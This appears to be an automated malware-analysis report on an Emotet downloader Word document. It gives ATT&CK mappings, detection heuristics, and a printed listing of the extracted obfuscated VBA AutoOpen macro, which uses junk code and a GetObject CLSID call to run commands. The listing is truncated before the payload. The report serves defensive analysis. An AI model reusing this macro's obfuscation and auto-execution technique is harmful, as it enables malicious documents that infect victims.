Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
T1059.003 Windows Command Shell
T1190 Exploit Public-Facing Application
T1203 Exploitation for Client Execution
The sample contains a critical heuristic firing for instantiating the dangerous WScript.Shell COM object via VBA, indicating an attempt to execute commands. The ClamAV detection as 'Doc.Downloader.Emotet' strongly suggests the Emotet family. The VBA macro is heavily obfuscated but appears to be designed to download and execute a second-stage payload, likely using the WScript.Shell object.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6826445-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826445-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: b3eeac1848acc3cfef1aebdd46aa604fa75f4d0000a7a02c6281d19dad0208f7) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8745 bytes |

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "TLBqvTfNM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case wZAqtZPd
Case 32277100
RUkGDosS = CBool(VGWniAdrA)
NBFHUEHp = 275180876
Case 125679562
wbHRPknuR = Atn(ipBccb)
RpQiOqrj = Atn(81360477 * CLng(86146068))
End Select
For Each BwwCzz In fOVTQqw
SiLDircV = zCIjkQl * CDate(XXsVV * qCGzMQwZ) * ljYMUJi / Sin(ZbZCzrn) / wjRtSEMww + 140678628 - 7364973 + Chr(160055243) + (QEZacXDME * tozTuv)
Next
On Error Resume Next
Select Case SGwqwQniI
Case 8693235
BPRowdk = CBool(MBKmwGG)
DjjSq = 102780153
Case 184952766
kIMcUOiYp = Atn(iNiZZjk)
JoHUAkrH = Atn(232430789 * CLng(338151442))
End Select
For Each ijmnRDp In IGzWlz
btaiJzi = GnsQI * CDate(kMffzGm * ZRVkSbbLS) * XaJwhEp / Sin(AajAZnh) / YtSroqmjT + 58057218 - 57454799 + Chr(168274801) + (GiuUVti * lfapTG)
Next
On Error Resume Next
Select Case lqRliUKY
Case 314352830
XqjUU = CBool(JbowBa)
WRFmGzGhA = 195652352
Case 341093114
DAmawZuFU = Atn(zVWhI)
SjuiLwuT = Atn(167182496 * CLng(224888571))
End Select
For Each YoTXM In XQOWBpWG
YSRjPY = WOTjQlFFS * CDate(QVVQA * mmzQtNRq) * bqacCqS / Sin(jSFDdSlL) / EAZAl + 27165583 - 158067586 + Chr(244315539) + (wQIzJzc * pvfdQK)
Next
On Error Resume Next
Select Case IcltQvSFp
Case 260923777
rqYYG = CBool(ZqMujZ)
BRzUXIaP = 195964373
Case 205220872
DtvZfrqQ = Atn(FiliiGjH)
cDcDBrz = Atn(315877314 * CLng(334430944))
End Select
For Each hNmNLqUM In zKUEPki
fVpRbSu = bEAsD * CDate(jsIjbSQ * nJtHHKH) * MTXUUaJRF / Sin(sLjlUTUZb) / vjILGEi + 210200581 - 153468098 + Chr(127409647) + (jubsjU * GJjqdhaE)
Next
Set ZsiCcD = Shapes("czuiJuYEJsmWu")
On Error Resume Next
Select Case FRTAZ
Case 89750450
NDkHVtwqr = CBool(lQhEifGO)
AWGvBbl = 131740289
Case 322150338
jAUZPhpW = Atn(IjXWcpHYH)
alNmwNaGH = Atn(230309545 * CLng(210480457))
End Select
For Each ZzEKkRqR In pIHGvcz
GtDdVWA = NVMoah * CDate(TXHXSSFq * qbkcFjCk) * dBpcGDd / Sin(qXvdd) / IVninEjKB + 20998554 - 140440733 + Chr(260888041) + (lYNjTcNwj * qQDuObhuE)
Next
On Error Resume Next
Select Case jzrRC
Case 323338675
AkUjiVc = CBool(hdqstjOj)
YFzVw = 74622052
Case 90191876
pHijcq = Atn(dkHjbC)
aquwhtE = Atn(11506554 * CLng(127204881))
End Select
For Each SjtwAJ In ZGLpO
AEmbPIbiF = wiGbz * CDate(UQnoORt * SdbCHUrkM) * uuvSptrlN / Sin(uRthHvm) / BaiiLpIlj + 162362339 - 182107571 + Chr(240232542) + (OSJhDi * atwdD)
Next
CjIdvLqXN = "" + juvLh + mSLiFJD + JdQjzk + ZsiCcD.TextFrame.TextRange.Text + NkUHd + wnIBmdQ
On Error Resume Next
Select Case rlSFp
Case 40527497
ZqjJqUG = CBool(azzWhGRI)
DdzIja = 259670923
Case 11748026
ziEbUJtzU = Atn(AbCdUMHF)
uZwadFBLG = Atn(91320289 * CLng(276774268))
End Select
For Each vHvUXj In fqckmiIlB
iwbVo = UDIbV * CDate(zmjiWE * GIzdIa) * SpKvV / Sin(ALcROu) / BbQOH + 195404759 - 82981355 + Chr(296597526) + (BIIDRush * Svfoft)
Next
On Error Resume Next
Select Case wniQLqrZo
Case 332945859
SPSUdW = CBool(jUfTC)
IwFJHK = 18980131
Case 282209303
vCHQLB = Atn(fdNii)
ORYCktff = Atn(126012108 * CLng(189002490))
End Select
For Each PHMlhRdv In zUPMMLE
pCGYkTk = lEaJLmcZ * CDate(BDpTzLj * NouBLqZp) * qQVNi / Sin(czwMCmJM) / ppKHOKrrX + 275329366 - 150241716 + Chr(205713061) + (lZOBTKwM * JWPNV)
Next
Set AozjuhMQ = GetObject("new:72C24DD5-D70A-438
... (truncated)